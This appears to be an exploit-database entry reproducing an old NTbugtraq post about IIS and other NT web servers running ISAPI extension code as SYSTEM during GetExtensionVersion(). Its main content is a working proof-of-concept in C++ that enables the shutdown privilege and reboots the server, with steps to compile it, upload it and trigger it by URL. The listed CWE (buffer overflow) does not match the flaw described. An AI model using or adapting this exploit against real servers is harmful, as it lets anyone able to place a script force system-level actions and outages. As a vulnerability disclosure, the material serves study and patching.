IIS and other NT web servers GetExtensionVersion() vulnerability

vendor:

N/A

by:

Fabien Royer

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2002

IIS and other NT web servers GetExtensionVersion() vulnerability

IIS and potentially other NT web servers have a vulnerability that could allow arbitrary code to be run as SYSTEM. This works because of the way the server calls the GetExtensionVersion() function the first time an ISAPI extension is loaded. Any user able to put a CGI script in the web structure can insert code that will be run as SYSTEM during this window. Using VC++, create an ISAPI extension project and call it CRbExtension. Replace GetExtensionVersion() and Default() with the code below. Compile it to something simple, like rb.dll. Place it on your web server and invoke it from your browser like this http://your.machine.namerb.dll? Note: if you are using IE4.0, don't call this from the machine that is running the web server otherwise, the next time you log in, IE will recall the last URL and you'll reboot again.

Mitigation:

Ensure that the web server is running the latest version of the software and that all security patches have been applied.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/501/info


IIS and potentially other NT web servers have a vulnerability that could allow arbitrary code to be run as SYSTEM. This works because of the way the server calls the GetExtensionVersion() function the first time an ISAPI extension is loaded. Any user able to put a CGI script in the web structure can insert code that will be run as SYSTEM during this window.


Copied verbatim from a post to NTbugtraq by Fabien Royer <fabienr@BELLATLANTIC.NET>.

Using VC++, create an ISAPI extension project and call it CRbExtension. Replace GetExtensionVersion() and Default() with the code below. Compile it to something
simple, like rb.dll. Place it on your web server and invoke it from your browser like this http://your.machine.namerb.dll? Note: if you are using IE4.0, don't call this from
the machine that is running the web server otherwise, the next time you log in, IE will recall the last URL and you'll reboot again.

BOOL CRbExtension::GetExtensionVersion(HSE_VERSION_INFO* pVer)
{ HANDLE hToken; // handle to process token TOKEN_PRIVILEGES tkp; // pointer to token structure

// Get the current process token handle so we can get shutdown // privilege. OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY, &hToken);

// Get the LUID for shutdown privilege. LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid);

tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

// Get shutdown privilege for this process. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);

ExitWindowsEx(EWX_REBOOT,0);

// Disable shutdown privilege. tkp.Privileges[0].Attributes = 0; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);

// Call default implementation for initialization CHttpServer::GetExtensionVersion(pVer);

// Load description string TCHAR sz[HSE_MAX_EXT_DLL_NAME_LEN+1]; ISAPIVERIFY(::LoadString(AfxGetResourceHandle(),IDS_SERVER, sz,
HSE_MAX_EXT_DLL_NAME_LEN)); _tcscpy(pVer->lpszExtensionDesc, sz); return TRUE;
}

void CRbExtension::Default(CHttpServerContext* pCtxt)
{ StartContent(pCtxt); WriteTitle(pCtxt);

*pCtxt << _T("Reboot<br>");

EndContent(pCtxt);
}